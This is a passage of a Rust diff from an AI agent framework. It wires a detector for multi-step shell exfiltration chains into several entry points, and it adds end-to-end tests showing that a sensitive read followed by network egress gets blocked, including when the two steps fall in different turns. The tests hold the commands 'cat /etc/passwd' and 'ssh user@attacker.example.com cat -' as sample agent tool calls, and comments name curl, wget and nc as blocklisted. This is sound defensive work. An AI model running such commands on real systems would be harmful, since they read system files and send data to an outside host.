+    W: zeph_tools::ToolExecutor,
+{
+    zeph_tools::CompositeExecutor::new(
+        file_executor,
+        zeph_tools::CompositeExecutor::new(
+            scrape_executor,
+            zeph_tools::CompositeExecutor::new(
+                zeph_tools::SetCwdExecutor::new(cwd_allowed_paths),
+                zeph_tools::CompositeExecutor::new(diagnostics_executor, time_executor),
+            ),
+        ),
+    )
+}
+
 /// Wraps `base` with the runtime-gated `web_search` tool (spec 006-1-web-search) as an
 /// outer composite layer, so the fixed nested type of [`build_base_executor_chain`] and
 /// its many test callers never need to know about `web_search`'s presence.
@@ -3191,6 +3256,7 @@ mod tests {
             Some(&pool),
             &provider,
             None,
+            std::sync::Arc::new(parking_lot::Mutex::new(Vec::new())),
         )
         .await;
         assert!(
@@ -3217,11 +3283,93 @@ mod tests {
             Some(&pool),
             &provider,
             None,
+            std::sync::Arc::new(parking_lot::Mutex::new(Vec::new())),
         )
         .await;
         assert!(
             tool_setup.mcp_media_enabled,
             "MediaSanitizer must be attached when --no-mcp-media is not set"
+        );
+    }
+
+    fn agent_setup_bash_call(command: &str) -> zeph_tools::ToolCall {
+        let mut params = serde_json::Map::new();
+        params.insert(
+            "command".into(),
+            serde_json::Value::String(command.to_owned()),
+        );
+        zeph_tools::ToolCall {
+            tool_id: "bash".into(),
+            params,
+            caller_id: None,
+            context: None,
+            tool_call_id: String::new(),
+            skill_name: None,
+        }
+    }
+
+    /// E2E test for #6561/#6588: constructs `build_tool_setup` — the runner (CLI/TUI) entry
+    /// point's REAL production tool-executor assembly — with a real signal queue, and
+    /// dispatches a `SensitiveRead -> NetworkEgress` chain through the returned executor,
+    /// proving the queue-wiring fix from #6561 is actually live on the runner path, not just
+    /// that `RiskChainAccumulator` blocks in isolation (see `risk_chain.rs`'s own unit tests
+    /// for that).
+    #[tokio::test]
+    async fn build_tool_setup_wires_risk_chain_and_blocks_exfil_sequence() {
+        use zeph_tools::executor::ToolExecutor;
+
+        let mut config = Config::load(Path::new("/nonexistent")).unwrap();
+        // Allow every path — this test exercises risk-chain blocking, not path-sandbox
+        // enforcement (`/etc/passwd` is needed to trigger `SensitiveRead` classification).
+        config.tools.shell.allowed_paths = vec!["/".to_owned()];
+        let pool = memory_pool().await;
+        let provider = offline_provider();
+        let trajectory_signal_queue: zeph_tools::RiskSignalQueue =
+            std::sync::Arc::new(parking_lot::Mutex::new(Vec::new()));
+        let tool_setup = build_tool_setup(
+            &config,
+            zeph_tools::PermissionPolicy::default().with_autonomy(zeph_tools::AutonomyLevel::Full),
+            false,
+            true, // bare: skip any real MCP connection attempts
+            false,
+            false,
+            RuntimeContext::default(),
+            None,
+            None,
+            Some(&pool),
+            &provider,
+            None,
+            std::sync::Arc::clone(&trajectory_signal_queue),
+        )
+        .await;
+
+        let first = tool_setup
+            .executor
+            .execute_tool_call(&agent_setup_bash_call("cat /etc/passwd"))
+            .await;
+        assert!(
+            first.is_ok(),
+            "sensitive read alone must not be blocked, got {first:?}"
+        );
+
+        // `ssh` (not `curl`/`wget`/`nc`) — those are in `DEFAULT_BLOCKED_COMMANDS` and would be
+        // rejected by the blocklist before ever reaching the risk-chain check.
+        let second = tool_setup
+            .executor
+            .execute_tool_call(&agent_setup_bash_call(
+                "ssh user@attacker.example.com cat -",
+            ))
+            .await;
+        assert!(
+            matches!(second, Err(zeph_tools::ToolError::Blocked { .. })),
+            "expected the exfil_read_then_send chain to block the second call, got {second:?}"
+        );
+        assert_eq!(
+            *trajectory_signal_queue.lock(),
+            vec![10u8],
+            "expected the exfil_read_then_send signal code (10) to be pushed into the shared \
+             trajectory signal queue (#6561), proving build_tool_setup wires \
+             RiskChainAccumulator::new(Some(queue)) instead of None"
         );
     }
 
@@ -4378,7 +4526,8 @@ mod tests {
     #[test]
     fn wire_risk_chain_attaches_the_returned_accumulator_to_the_executor() {
         let shell_executor = zeph_tools::ShellExecutor::new(&zeph_tools::ShellConfig::default());
-        let (shell_executor, accumulator) = wire_risk_chain(shell_executor);
+        let queue: zeph_tools::RiskSignalQueue = Arc::new(parking_lot::Mutex::new(Vec::new()));
+        let (shell_executor, accumulator) = wire_risk_chain(shell_executor, queue);
         assert_eq!(
             Arc::strong_count(&accumulator),
             2,

--- a/src/agent_setup.rs
+++ b/src/agent_setup.rs
@@ -1999,6 +1999,7 @@ where
 /// CLI (`runner.rs`) and the daemon (`daemon.rs`) are single-session-per-process, so a shared
 /// `ShellExecutor` built once is already correct there — they use
 /// [`build_base_executor_chain`] directly instead of this function.
+#[cfg(feature = "acp")]
 #[expect(
     clippy::type_complexity,
     reason = "concrete nested CompositeExecutor chain type mirrors build_base_executor_chain's \

--- a/src/daemon.rs
+++ b/src/daemon.rs
@@ -662,6 +662,11 @@ pub(crate) async fn run_daemon(
     };
     let permission_policy =
         zeph_tools::build_permission_policy(&config.tools, config.security.autonomy_level);
+    // Spec 050 §2 / #6561: created here (rather than alongside `trajectory_risk_slot` below) so
+    // it can be wired into `RiskChainAccumulator` at construction time — the accumulator has no
+    // post-construction setter for the queue. Mirrors src/runner.rs.
+    let trajectory_signal_queue: zeph_tools::RiskSignalQueue =
+        std::sync::Arc::new(parking_lot::Mutex::new(Vec::new()));
     let mut shell_executor = zeph_tools::ShellExecutor::new(&config.tools.shell)
         .with_permissions(permission_policy.clone())
         .with_output_filters(filter_registry)
@@ -737,11 +742,17 @@ pub(crate) async fn run_daemon(
         }
         daemon_audit_logger = Some(logger);
     }
-    // #6578: wire the multi-step shell attack-chain detector, matching src/runner.rs's
+    // #6578/#6561: wire the multi-step shell attack-chain detector, matching src/runner.rs's
     // `agent_setup::build_tool_setup` — previously only the CLI/TUI path constructed a
     // `RiskChainAccumulator`, so the daemon's `ShellExecutor` silently skipped the
-    // `SensitiveRead` -> `NetworkEgress` chain check entirely.
-    let (shell_executor, risk_chain_accumulator) = agent_setup::wire_risk_chain(shell_executor);
+    // `SensitiveRead` -> `NetworkEgress` chain check entirely. Passes `trajectory_signal_queue`
+    // (created above) so a chain split across turns still reaches `TrajectorySentinel`/MAGE.
+    // The daemon runs one agent per process (not multi-session), so a single instance for the
+    // process lifetime is correct here — unlike ACP/serve (#6588), no per-session rebuild needed.
+    let (shell_executor, risk_chain_accumulator) = agent_setup::wire_risk_chain(
+        shell_executor,
+        std::sync::Arc::clone(&trajectory_signal_queue),
+    );
     let file_executor = zeph_tools::FileExecutor::new(
         config
             .tools
@@ -890,14 +901,13 @@ pub(crate) async fn run_daemon(
     let (trust_gated, mcp_ids_handle) =
         agent_setup::apply_common_tool_gating(inner_executor, &permission_policy);
     agent_setup::register_mcp_tool_ids(&mcp_ids_handle, &mcp_tools);
-    // #5958: shared trajectory risk slot — written by begin_turn(), read by PolicyGateExecutor —
-    // and pending risk signal queue — executor layers push signal codes; begin_turn() drains.
-    // Mirrors src/runner.rs; previously the daemon never created these, so TrajectorySentinel
+    // #5958: shared trajectory risk slot — written by begin_turn(), read by PolicyGateExecutor.
+    // Mirrors src/runner.rs; previously the daemon never created this, so TrajectorySentinel
     // was never wired into the daemon's tool-gate chain or the Agent itself (see below).
+    // The signal queue itself was created earlier (before `shell_executor`, for #6561) and is
+    // reused here.
     let trajectory_risk_slot: zeph_tools::TrajectoryRiskSlot =
         std::sync::Arc::new(parking_lot::RwLock::new(0u8));
-    let trajectory_signal_queue: zeph_tools::RiskSignalQueue =
-        std::sync::Arc::new(parking_lot::Mutex::new(Vec::new()));
     // Wire the same PolicyGateExecutor / AdversarialPolicyGateExecutor stack the CLI
     // path (src/runner.rs) applies around its full tool composite, so declarative
     // (`[tools.policy]`/`[tools.authorization]`) and LLM-based (`[tools.adversarial_policy]`)
@@ -1807,6 +1817,154 @@ mod tests {
         assert!(
             matches!(result, Err(zeph_tools::ToolError::SandboxViolation { .. })),
             "expected SandboxViolation from DiagnosticsExecutor, got {result:?}"
+        );
+    }
+
+    fn bash_call(command: &str) -> zeph_tools::ToolCall {
+        let mut params = serde_json::Map::new();
+        params.insert(
+            "command".into(),
+            serde_json::Value::String(command.to_owned()),
+        );
+        zeph_tools::ToolCall {
+            tool_id: "bash".into(),
+            params,
+            caller_id: None,
+            context: None,
+            tool_call_id: String::new(),
+            skill_name: None,
+        }
+    }
+
+    /// E2E test for #6561/#6588 (companion to `diagnostics_tool_call_dispatches_through_
+    /// daemon_composite_chain`): constructs the daemon's REAL production `ShellExecutor` +
+    /// `RiskChainAccumulator` wiring (mirrors `run_daemon`'s construction exactly — a single
+    /// shared instance, since the daemon runs one agent per process) and dispatches a
+    /// `SensitiveRead -> NetworkEgress` chain through it, proving the chain is actually blocked
+    /// in the daemon entry point, not just that the helper functions compile in isolation.
+    #[tokio::test]
+    async fn risk_chain_blocks_exfil_sequence_through_daemon_composite_chain() {
+        use std::sync::Arc;
+        use zeph_tools::executor::ToolExecutor;
+
+        let mut config = Config::default();
+        // Allow every path — this test exercises risk-chain blocking, not path-sandbox
+        // enforcement, and `/etc/passwd` (needed to trigger `SensitiveRead` classification)
+        // would otherwise be rejected by `ShellExecutor`'s own path-sandbox check before ever
+        // reaching the risk-chain check.
+        config.tools.shell.allowed_paths = vec!["/".to_owned()];
+        let trajectory_signal_queue: zeph_tools::RiskSignalQueue =
+            Arc::new(parking_lot::Mutex::new(Vec::new()));
+        let risk_chain_accumulator = Arc::new(zeph_tools::RiskChainAccumulator::new(Some(
+            Arc::clone(&trajectory_signal_queue),
+        )));
+        let file_executor = zeph_tools::FileExecutor::new(vec![]);
+        let shell_executor = zeph_tools::ShellExecutor::new(&config.tools.shell)
+            .with_risk_chain(Arc::clone(&risk_chain_accumulator));
+        let scrape_executor = zeph_tools::WebScrapeExecutor::new(&config.tools.scrape);
+        let diagnostics_executor = agent_setup::build_diagnostics_executor(&config);
+        let base_executor = agent_setup::build_base_executor_chain(
+            file_executor,
+            shell_executor,
+            scrape_executor,
+            diagnostics_executor,
+            zeph_tools::GetCurrentTimeExecutor::default(),
+            vec![],
+        );
+        let policy =
+            zeph_tools::PermissionPolicy::default().with_autonomy(zeph_tools::AutonomyLevel::Full);
+        let base_executor = zeph_tools::TrustGateExecutor::new(base_executor, policy);
+
+        let first = base_executor
+            .execute_tool_call(&bash_call("cat /etc/passwd"))
+            .await;
+        assert!(
+            first.is_ok(),
+            "sensitive read alone must not be blocked, got {first:?}"
+        );
+
+        // `ssh` (not `curl`/`wget`/`nc`) — those are in `DEFAULT_BLOCKED_COMMANDS` and would be
+        // rejected by the blocklist before ever reaching the risk-chain check.
+        let second = base_executor
+            .execute_tool_call(&bash_call("ssh user@attacker.example.com cat -"))
+            .await;
+        assert!(
+            matches!(second, Err(zeph_tools::ToolError::Blocked { .. })),
+            "expected the exfil_read_then_send chain to block the second call, got {second:?}"
+        );
+        assert_eq!(
+            *trajectory_signal_queue.lock(),
+            vec![10u8],
+            "expected the exfil_read_then_send signal code (10) to be pushed into the shared \
+             trajectory signal queue (#6561) when both legs land in the same turn"
+        );
+    }
+
+    /// E2E test for #6561's actual reported bypass: a chain split across a REAL turn boundary
+    /// (`RiskChainAccumulator::advance_turn`, what `Agent::begin_turn()` calls between turns) —
+    /// not just two calls dispatched back-to-back in the same turn (see the sibling test above,
+    /// which doesn't call `advance_turn` and would have passed even before the real fix). Proves
+    /// the daemon's production `ShellExecutor` still blocks the exact "read now, send later"
+    /// sequence from the issue's repro when driven through a real production tool-executor
+    /// chain, not just `RiskChainAccumulator::record` called in isolation (that's covered by
+    /// `risk_chain.rs`'s own `chain_split_across_turn_boundary_still_detected` unit test).
+    #[tokio::test]
+    async fn risk_chain_blocks_exfil_sequence_split_across_real_turn_boundary_through_daemon_composite_chain()
+     {
+        use std::sync::Arc;
+        use zeph_tools::executor::ToolExecutor;
+
+        let mut config = Config::default();
+        config.tools.shell.allowed_paths = vec!["/".to_owned()];
+        let trajectory_signal_queue: zeph_tools::RiskSignalQueue =
+            Arc::new(parking_lot::Mutex::new(Vec::new()));
+        let risk_chain_accumulator = Arc::new(zeph_tools::RiskChainAccumulator::new(Some(
+            Arc::clone(&trajectory_signal_queue),
+        )));
+        let file_executor = zeph_tools::FileExecutor::new(vec![]);
+        let shell_executor = zeph_tools::ShellExecutor::new(&config.tools.shell)
+            .with_risk_chain(Arc::clone(&risk_chain_accumulator));
+        let scrape_executor = zeph_tools::WebScrapeExecutor::new(&config.tools.scrape);
+        let diagnostics_executor = agent_setup::build_diagnostics_executor(&config);
+        let base_executor = agent_setup::build_base_executor_chain(
+            file_executor,
+            shell_executor,
+            scrape_executor,
+            diagnostics_executor,
+            zeph_tools::GetCurrentTimeExecutor::default(),
+            vec![],
+        );
+        let policy =
+            zeph_tools::PermissionPolicy::default().with_autonomy(zeph_tools::AutonomyLevel::Full);
+        let base_executor = zeph_tools::TrustGateExecutor::new(base_executor, policy);
+
+        // Turn N: sensitive read alone.
+        let first = base_executor
+            .execute_tool_call(&bash_call("cat /etc/passwd"))
+            .await;
+        assert!(
+            first.is_ok(),
+            "sensitive read alone must not be blocked, got {first:?}"
+        );
+
+        // Simulate the real turn boundary — this is what `Agent::begin_turn()` calls.
+        risk_chain_accumulator.advance_turn();
+
+        // Turn N+1: network egress. Before the #6561 fix (full clear on turn boundary), this
+        // would NOT be blocked — the read from turn N would have been forgotten.
+        let second = base_executor
+            .execute_tool_call(&bash_call("ssh user@attacker.example.com cat -"))
+            .await;
+        assert!(
+            matches!(second, Err(zeph_tools::ToolError::Blocked { .. })),
+            "expected the exfil_read_then_send chain to still block the second call even \
+             though its legs landed in different turns, got {second:?}"
+        );
+        assert_eq!(
+            *trajectory_signal_queue.lock(),
+            vec![10u8],
+            "expected the exfil_read_then_send signal code (10) to be pushed even for a chain \
+             split across a real turn boundary"
         );
     }
 

--- a/src/runner.rs
+++ b/src/runner.rs
@@ -1642,6 +1642,11 @@ pub(crate) async fn run(mut cli: Cli) -> anyhow::Result<()> {
         #[cfg(not(feature = "tui"))]
         let _backfill_handle = crate::bootstrap::spawn_embed_backfill(memory_arc, 300, None);
     }
+    // Spec 050 §2 / #6561: created here (rather than alongside `trajectory_risk_slot` below)
+    // so it can be passed into `build_tool_setup` and wired into `RiskChainAccumulator` at
+    // construction time — the accumulator has no post-construction setter for the queue.
+    let trajectory_signal_queue: zeph_tools::RiskSignalQueue =
+        std::sync::Arc::new(parking_lot::Mutex::new(Vec::new()));
     #[cfg(feature = "tui")]
     let mut tool_setup = tui_status_scope!("Connecting tools...", {
         agent_setup::build_tool_setup(
@@ -1657,6 +1662,7 @@ pub(crate) async fn run(mut cli: Cli) -> anyhow::Result<()> {
             Some(memory.sqlite().pool()),
             &provider,
             Some(&*supervisor),
+            std::sync::Arc::clone(&trajectory_signal_queue),
         )
         .await
     });
@@ -1674,6 +1680,7 @@ pub(crate) async fn run(mut cli: Cli) -> anyhow::Result<()> {
         Some(memory.sqlite().pool()),
         &provider,
         Some(&*supervisor),
+        std::sync::Arc::clone(&trajectory_signal_queue),
     )
     .await;
 
@@ -2369,9 +2376,9 @@ pub(crate) async fn run(mut cli: Cli) -> anyhow::Result<()> {
     // Spec 050: shared trajectory risk slot — written by begin_turn(), read by PolicyGateExecutor.
     let trajectory_risk_slot: zeph_tools::TrajectoryRiskSlot =
         std::sync::Arc::new(parking_lot::RwLock::new(0u8));
-    // Spec 050: pending risk signal queue — executor layers push signal codes; begin_turn() drains.
-    let trajectory_signal_queue: zeph_tools::RiskSignalQueue =
-        std::sync::Arc::new(parking_lot::Mutex::new(Vec::new()));
+    // Spec 050: pending risk signal queue — executor layers push signal codes; begin_turn()
+    // drains. Created earlier (before `build_tool_setup`) so the same queue could be wired
+    // into `RiskChainAccumulator` (#6561); reused here.
     // #5610/#5886: shared TrustGateExecutor wrap, also used by ACP (`src/acp.rs`) and the
     // daemon (`src/daemon.rs`) so all three entry points gate the full executor tree through
     // one code path.

--- a/src/serve/agent_factory.rs
+++ b/src/serve/agent_factory.rs
@@ -181,8 +181,41 @@ pub(crate) async fn build_agent_factory(
             ),
         )
     });
+    // #6588: build a fresh `ShellExecutor` for THIS session instead of sharing one across every
+    // `/sessions*` agent — see `ServeAgentDeps::tool_executor`'s doc comment. Reuses the
+    // server-scoped, expensive-to-build ingredients (sandbox, permission policy, audit logger,
+    // task supervisor) so nothing here re-does real work; only the `ShellExecutor` struct
+    // itself and its `RiskChainAccumulator` (via `wire_risk_chain`, wired to
+    // `trajectory_signal_queue` above for #6561) are new.
+    let mut session_shell_executor = zeph_tools::ShellExecutor::new(&deps.shell_ingredients.config)
+        .with_permissions(deps.permission_policy.clone())
+        .with_output_filters(if deps.shell_ingredients.filters_config.enabled {
+            zeph_tools::OutputFilterRegistry::default_filters(
+                &deps.shell_ingredients.filters_config,
+            )
+        } else {
+            zeph_tools::OutputFilterRegistry::new(false)
+        })
+        .with_task_supervisor(deps.shell_ingredients.task_supervisor.clone());
+    if let Some((ref sandbox, ref policy)) = deps.shell_ingredients.sandbox {
+        session_shell_executor =
+            session_shell_executor.with_sandbox(Arc::clone(sandbox), policy.clone());
+    }
+    if let Some(ref logger) = deps.audit_logger {
+        session_shell_executor = session_shell_executor.with_audit(Arc::clone(logger));
+    }
+    let (session_shell_executor, risk_chain_accumulator) = crate::agent_setup::wire_risk_chain(
+        session_shell_executor,
+        Arc::clone(&trajectory_signal_queue),
+    );
+    let session_tool_executor: Arc<dyn ErasedToolExecutor> =
+        Arc::new(zeph_tools::CompositeExecutor::new(
+            session_shell_executor,
+            zeph_tools::DynExecutor(deps.tool_executor),
+        ));
+
     let (composed_base, trust_snapshot) = compose_session_tool_tree(
-        deps.tool_executor,
+        session_tool_executor,
         &deps.registry,
         &deps.memory,
         conversation_id,
@@ -397,13 +430,13 @@ pub(crate) async fn build_agent_factory(
         // sanitize_tool_output's ratcheting is visible to MemoryToolExecutor's confirmation
         // check.
         agent = agent.with_memory_consent_trust_slot(memory_consent_trust_slot);
-        // Risk-chain accumulator (#6578), MAGE trajectory-risk gate (#6579), typed-page CAM
-        // fidelity (#6574) — shared with src/runner.rs/src/daemon.rs/src/acp.rs via one call
-        // site so the three controls cannot silently drop out of sync across entry points again
-        // (#6581).
+        // Risk-chain accumulator (#6561/#6588: this session's own instance, built alongside its
+        // `ShellExecutor` above), MAGE trajectory-risk gate (#6579), typed-page CAM fidelity
+        // (#6574) — shared with src/runner.rs/src/daemon.rs/src/acp.rs via one call site so the
+        // three controls cannot silently drop out of sync across entry points again (#6581).
         agent = crate::agent_setup::apply_entrypoint_security_controls(
             agent,
-            deps.risk_chain_accumulator,
+            risk_chain_accumulator,
             deps.shadow_memory_config,
             deps.typed_pages_state,
         );
@@ -437,10 +470,11 @@ pub(crate) async fn build_agent_factory(
 /// [`crate::agent_setup::apply_common_tool_gating`]'s doc comment and
 /// [`ServeAgentDeps::tool_executor`]'s doc comment for the full rationale.
 ///
-/// INVARIANT: `tool_executor` must already contain serve's ENTIRE tool surface (the base
-/// file/shell/scrape/cwd chain plus `skill_loader`/`skill_invoke`/`memory`/`overflow`, #6046 — see
-/// `build_agent_factory`'s composition above this call and `deps.rs::build_tool_executor`'s doc
-/// comment for the base) — any tool executor added to `ServeAgentDeps` outside that composed
+/// INVARIANT: `tool_executor` must already contain serve's ENTIRE tool surface (the shared
+/// file/scrape/cwd chain, this session's own fresh `shell` layer added on top per #6588, plus
+/// `skill_loader`/`skill_invoke`/`memory`/`overflow`, #6046 — see `build_agent_factory`'s
+/// composition above this call and `deps.rs::build_tool_executor`'s doc comment for the base) —
+/// any tool executor added to `ServeAgentDeps` outside that composed
 /// tree, or composed onto the result of this wrap (other than the `ScopedToolExecutor`/
 /// `ShadowProbeExecutor` wraps `build_agent_factory` applies afterward, which wrap OUTSIDE the
 /// gate stack by design, matching `runner.rs`/`acp.rs`), bypasses trust/policy/adversarial
@@ -997,6 +1031,7 @@ mod tests {
             rl_warmup_updates: 0,
             rl_head: None,
             tool_executor: Arc::new(zeph_tools::SetCwdExecutor::new(vec![])),
+            shell_ingredients: crate::serve::deps::ShellSessionIngredients::default(),
             capability_scopes_config: zeph_config::CapabilityScopesConfig::default(),
             permission_policy: zeph_tools::PermissionPolicy::default(),
             audit_logger: None,
@@ -1033,7 +1068,6 @@ mod tests {
             secret_registry: None,
             vigil_config: zeph_config::VigilConfig::default(),
             feedback_classifier: None,
-            risk_chain_accumulator: Arc::new(zeph_tools::RiskChainAccumulator::new(None)),
             typed_pages_state: None,
             shadow_memory_config: zeph_config::TrajectoryRiskAccumulatorConfig::default(),
         };
@@ -1101,6 +1135,7 @@ mod tests {
             rl_warmup_updates: 0,
             rl_head: None,
             tool_executor: Arc::new(zeph_tools::SetCwdExecutor::new(vec![])),
+            shell_ingredients: crate::serve::deps::ShellSessionIngredients::default(),
             capability_scopes_config: zeph_config::CapabilityScopesConfig::default(),
             permission_policy: zeph_tools::PermissionPolicy::default(),
             audit_logger: None,
@@ -1140,7 +1175,6 @@ mod tests {
             secret_registry: None,
             vigil_config: zeph_config::VigilConfig::default(),
             feedback_classifier: None,
-            risk_chain_accumulator: Arc::new(zeph_tools::RiskChainAccumulator::new(None)),
             typed_pages_state: None,
             shadow_memory_config: zeph_config::TrajectoryRiskAccumulatorConfig::default(),
         };
@@ -1204,6 +1238,7 @@ mod tests {
             rl_warmup_updates: 0,
             rl_head: None,
             tool_executor: Arc::new(zeph_tools::SetCwdExecutor::new(vec![])),
+            shell_ingredients: crate::serve::deps::ShellSessionIngredients::default(),
             capability_scopes_config: zeph_config::CapabilityScopesConfig::default(),
             permission_policy: zeph_tools::PermissionPolicy::default(),
             audit_logger: None,
@@ -1244,7 +1279,6 @@ mod tests {
             secret_registry: None,
             vigil_config: zeph_config::VigilConfig::default(),
             feedback_classifier: None,
-            risk_chain_accumulator: Arc::new(zeph_tools::RiskChainAccumulator::new(None)),
             typed_pages_state: None,
             shadow_memory_config: zeph_config::TrajectoryRiskAccumulatorConfig::default(),
         };
@@ -1338,6 +1372,7 @@ mod tests {
             rl_warmup_updates: 0,
             rl_head: None,
             tool_executor: Arc::new(zeph_tools::SetCwdExecutor::new(vec![])),
+            shell_ingredients: crate::serve::deps::ShellSessionIngredients::default(),
             capability_scopes_config: zeph_config::CapabilityScopesConfig::default(),
             permission_policy: zeph_tools::PermissionPolicy::default(),
             audit_logger: None,
@@ -1374,7 +1409,6 @@ mod tests {
             secret_registry: None,
             vigil_config: zeph_config::VigilConfig::default(),
             feedback_classifier: None,
-            risk_chain_accumulator: Arc::new(zeph_tools::RiskChainAccumulator::new(None)),
             typed_pages_state: None,
             shadow_memory_config: zeph_config::TrajectoryRiskAccumulatorConfig::default(),
         };
@@ -1457,6 +1491,7 @@ mod tests {
             rl_warmup_updates: 0,
             rl_head: None,
             tool_executor: Arc::new(zeph_tools::SetCwdExecutor::new(vec![])),
+            shell_ingredients: crate::serve::deps::ShellSessionIngredients::default(),
             capability_scopes_config: zeph_config::CapabilityScopesConfig::default(),
             permission_policy: zeph_tools::PermissionPolicy::default(),
             audit_logger: None,
@@ -1493,7 +1528,6 @@ mod tests {
             secret_registry: None,
             vigil_config: zeph_config::VigilConfig::default(),
             feedback_classifier: None,
-            risk_chain_accumulator: Arc::new(zeph_tools::RiskChainAccumulator::new(None)),
             typed_pages_state: None,
             shadow_memory_config: zeph_config::TrajectoryRiskAccumulatorConfig::default(),
         };
@@ -1575,6 +1609,7 @@ mod tests {
             rl_warmup_updates: 3,
             rl_head: Some(zeph_skills::rl_head::RoutingHead::new(8)),
             tool_executor: Arc::new(zeph_tools::SetCwdExecutor::new(vec![])),
+            shell_ingredients: crate::serve::deps::ShellSessionIngredients::default(),
             capability_scopes_config: zeph_config::CapabilityScopesConfig::default(),
             permission_policy: zeph_tools::PermissionPolicy::default(),
             audit_logger: None,
@@ -1611,7 +1646,6 @@ mod tests {
             secret_registry: None,
             vigil_config: zeph_config::VigilConfig::default(),
             feedback_classifier: None,
-            risk_chain_accumulator: Arc::new(zeph_tools::RiskChainAccumulator::new(None)),
             typed_pages_state: None,
             shadow_memory_config: zeph_config::TrajectoryRiskAccumulatorConfig::default(),
         };
@@ -1690,6 +1724,7 @@ mod tests {
             rl_warmup_updates: 0,
             rl_head: None,
             tool_executor: Arc::new(zeph_tools::SetCwdExecutor::new(vec![])),
+            shell_ingredients: crate::serve::deps::ShellSessionIngredients::default(),
             capability_scopes_config: zeph_config::CapabilityScopesConfig::default(),
             permission_policy: zeph_tools::PermissionPolicy::default(),
             audit_logger: None,
@@ -1726,7 +1761,6 @@ mod tests {
             secret_registry: None,
             vigil_config: zeph_config::VigilConfig::default(),
             feedback_classifier: None,
-            risk_chain_accumulator: Arc::new(zeph_tools::RiskChainAccumulator::new(None)),
             typed_pages_state: None,
             shadow_memory_config: zeph_config::TrajectoryRiskAccumulatorConfig::default(),
         };
@@ -1787,6 +1821,7 @@ mod tests {
             rl_warmup_updates: 0,
             rl_head: None,
             tool_executor: Arc::new(zeph_tools::SetCwdExecutor::new(vec![])),
+            shell_ingredients: crate::serve::deps::ShellSessionIngredients::default(),
             capability_scopes_config: zeph_config::CapabilityScopesConfig::default(),
             permission_policy: zeph_tools::PermissionPolicy::default()
                 .with_autonomy(zeph_tools::AutonomyLevel::Full),
@@ -1824,7 +1859,6 @@ mod tests {
             secret_registry: None,
             vigil_config: zeph_config::VigilConfig::default(),
             feedback_classifier: None,
-            risk_chain_accumulator: Arc::new(zeph_tools::RiskChainAccumulator::new(None)),
             typed_pages_state: None,
             shadow_memory_config: zeph_config::TrajectoryRiskAccumulatorConfig::default(),
         }
@@ -2029,6 +2063,151 @@ mod tests {
              signal queue after a denied tool call, proving gate_serve_session_executor's \
              trajectory parameter is actually wired through to PolicyGateExecutor instead of \
              the old hardcoded None"
+        );
+    }
+
+    fn make_bash_call(command: &str) -> zeph_tools::ToolCall {
+        let mut params = serde_json::Map::new();
+        params.insert(
+            "command".into(),
+            serde_json::Value::String(command.to_owned()),
+        );
+        zeph_tools::ToolCall {
+            tool_id: "bash".into(),
+            params,
+            caller_id: None,
+            context: None,
+            tool_call_id: String::new(),
+            skill_name: None,
+        }
+    }
+
+    /// Builds one session's per-session `ShellExecutor` + shared file/scrape/cwd chain exactly
+    /// as `build_agent_factory` now does (#6588): a fresh `ShellExecutor` wired with its own
+    /// `RiskChainAccumulator`, composed as an outer `CompositeExecutor` layer around the shared
+    /// base chain (mirrors `deps.rs::build_tool_executor`'s file/scrape/cwd composition, minus
+    /// shell). Returns the gated executor and the signal queue so callers can assert on both
+    /// dispatch outcomes and the #6561 cross-turn fallback.
+    fn build_serve_session_shell_composite(
+        allowed_paths: Vec<String>,
+    ) -> (zeph_tools::DynExecutor, zeph_tools::RiskSignalQueue) {
+        let mut config = zeph_core::config::Config::default();
+        config.tools.shell.allowed_paths = allowed_paths;
+        let trajectory_signal_queue: zeph_tools::RiskSignalQueue =
+            Arc::new(parking_lot::Mutex::new(Vec::new()));
+        let risk_chain_accumulator = Arc::new(zeph_tools::RiskChainAccumulator::new(Some(
+            Arc::clone(&trajectory_signal_queue),
+        )));
+        let session_shell_executor = zeph_tools::ShellExecutor::new(&config.tools.shell)
+            .with_risk_chain(Arc::clone(&risk_chain_accumulator));
+        let file_executor = zeph_tools::FileExecutor::new(
+            config
+                .tools
+                .shell
+                .allowed_paths
+                .iter()
+                .map(std::path::PathBuf::from)
+                .collect(),
+        );
+        let scrape_executor = zeph_tools::WebScrapeExecutor::new(&config.tools.scrape);
+        let cwd_executor = zeph_tools::SetCwdExecutor::new(
+            config
+                .tools
+                .shell
+                .allowed_paths
+                .iter()
+                .map(std::path::PathBuf::from)
+                .collect(),
+        );
+        let rest: Arc<dyn ErasedToolExecutor> = Arc::new(zeph_tools::CompositeExecutor::new(
+            file_executor,
+            zeph_tools::CompositeExecutor::new(
+                scrape_executor,
+                crate::agent_setup::with_search_executor(cwd_executor, None),
+            ),
+        ));
+        let composite: Arc<dyn ErasedToolExecutor> = Arc::new(zeph_tools::CompositeExecutor::new(
+            session_shell_executor,
+            zeph_tools::DynExecutor(rest),
+        ));
+        let policy =
+            zeph_tools::PermissionPolicy::default().with_autonomy(zeph_tools::AutonomyLevel::Full);
+        let gated = gate_serve_session_executor(
+            composite,
+            &policy,
+            &crate::agent_setup::PolicyGatePieces::default(),
+            None,
+            None,
+        );
+        (gated, trajectory_signal_queue)
+    }
+
+    /// E2E test for #6561/#6588: builds serve's per-session `ShellExecutor`/
+    /// `RiskChainAccumulator` composition exactly as `build_agent_factory` now does, and
+    /// dispatches a `SensitiveRead -> NetworkEgress` chain through it — proving the chain is
+    /// actually blocked via the real `/sessions*` tool-executor construction path, not just
+    /// that `RiskChainAccumulator` blocks in isolation.
+    #[tokio::test]
+    async fn risk_chain_blocks_exfil_sequence_through_serve_session_composite() {
+        let (gated, trajectory_signal_queue) =
+            build_serve_session_shell_composite(vec!["/".to_owned()]);
+
+        let first = gated
+            .execute_tool_call_erased(&make_bash_call("cat /etc/passwd"))
+            .await;
+        assert!(
+            first.is_ok(),
+            "sensitive read alone must not be blocked, got {first:?}"
+        );
+
+        // `ssh` (not `curl`/`wget`/`nc`) — those are in `DEFAULT_BLOCKED_COMMANDS` and would be
+        // rejected by the blocklist before ever reaching the risk-chain check.
+        let second = gated
+            .execute_tool_call_erased(&make_bash_call("ssh user@attacker.example.com cat -"))
+            .await;
+        assert!(
+            matches!(second, Err(zeph_tools::ToolError::Blocked { .. })),
+            "expected the exfil_read_then_send chain to block the second call, got {second:?}"
+        );
+        assert_eq!(
+            *trajectory_signal_queue.lock(),
+            vec![10u8],
+            "expected the exfil_read_then_send signal code (10) in the session's signal queue \
+             (#6561)"
+        );
+    }
+
+    /// E2E test for #6588 (per-session isolation): builds TWO independent serve session
+    /// composites the same way `build_agent_factory` builds one per `/sessions*` agent, drives
